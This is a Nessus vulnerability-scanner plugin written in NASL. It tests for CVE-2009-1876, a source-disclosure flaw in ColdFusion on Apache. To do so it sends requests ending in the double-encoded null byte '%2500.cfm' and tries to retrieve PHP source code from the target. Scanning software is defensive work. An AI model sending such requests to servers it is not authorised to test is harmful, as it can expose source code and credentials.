Vulnerabilities > CVE-2009-1876 - Unspecified vulnerability in Adobe Coldfusion

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");


if (description)
{
  script_id(40667);
  script_version("1.15");
  script_cvs_date("Date: 2018/11/15 20:50:16");

  script_cve_id("CVE-2009-1876");
  script_bugtraq_id(36096);
  script_xref(name:"Secunia", value:"36329");

  script_name(english:"Adobe ColdFusion On Apache Double Encoded NULL Byte Request File Content Disclosure");
  script_summary(english:"Tries to retrieve script code.");

  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote web server is affected by an
information disclosure vulnerability.");
  script_set_attribute( attribute:"description", value:
"The remote host is running a version of ColdFusion on Apache that is
affected by an information disclosure vulnerability. When requesting a
non-ColdFusion file, appending a double-encoded null byte and an
extension handled by ColdFusion (such as '.cfm') will display the
contents of that file. A remote attacker can exploit this to view the
source code of other files on the web server (e.g. PHP scripts), which
may contain credentials or other sensitive information.

This vulnerability is similar to CVE-2006-5858, which affected systems
running ColdFusion on IIS. This vulnerability reportedly only affects
systems running ColdFusion on Apache.");
  script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb09-12.html");
  script_set_attribute(attribute:"solution",value:"Apply the relevant hotfix referenced in the vendor's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/08/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/08/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/08/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:adobe:coldfusion");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  script_dependencies("apache_http_version.nasl", "coldfusion_detect.nasl");
  script_require_ports("Services/www", 80, 8500);
  script_require_keys("installed_sw/Apache", "installed_sw/ColdFusion");
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = 'ColdFusion';
get_install_count(app_name:app, exit_if_zero:TRUE);
get_install_count(app_name:"Apache", exit_if_zero:TRUE);
port = get_http_port(default:80);
install = get_single_install(app_name:"Apache", port:port);

doc = '/' + SCRIPT_NAME - ".nasl" + '-' + unixtime();
url = doc + '%2500.cfm';
res = http_send_recv3(
  method   : "GET",
  item     : url,
  port     : port,
  fetch404 : TRUE,
  exit_on_fail : TRUE
);

# Check for an error message that indicates ColdFusion ignored everything after
# the nulls
if (
  '<head><title>JRun Servlet Error</title>' >< res[2] &&
  doc + '</pre>' >< res[2]
)
{
  # If we're paranoid, try to get the source of a PHP file
  if (report_paranoia == 2)
  {
    i = 0;
    max_files = 10;
    files = get_kb_list("www/"+port+"/content/extensions/php");

    foreach file (files)
    {
       # First try to get the source
       source_url = file + '%2500.cfm';
       source = http_send_recv3(
         method : "GET",
         item   : source_url,
         port   : port,
         exit_on_fail : TRUE
       );

       # If this doesn't look like PHP, move on to the next file
       if ('<?' >!< source[2]) continue;

       # Now try to get the HTML generated by this page
       html = http_send_recv3(
         method : "GET",
         item   : file,
         port   : port,
         exit_on_fail : TRUE
       );

       #If there's a mismatch, the system's vulnerable
       if (source[2] != html[2])
       {
         if (report_verbosity > 0)
         {
           report =
             '\n' +
             'Nessus requested the following URL :\n\n' +
             '  ' + build_url(qs:source_url, port:port) + '\n' +
             '\nwhich yielded the following source code (limited to 10 lines):'+
             '\n\n' +
             '  ' + beginning_of_response(resp:source[2],max_lines:10) + '\n';

           security_warning(port:port, extra:report);
         }
         else security_warning(port);
         exit(0);
       }
       i++;
       if (i == max_files) break;
    }
  }
  # If we're not paranoid, or if getting PHP source failed, report the vuln
  # based on the error message
  if (report_verbosity > 0)
  {
    report =
      '\n' +
      'Nessus verified this based on the error message generated by\n' +
      'requesting the following URL :\n\n' +
      '  ' + build_url(qs:url, port:port) + '\n';
    security_warning(port:port, extra:report);
    exit(0);
  }
  else security_warning(port);
}
else audit(AUDIT_LISTEN_NOT_VULN, "Apache", port);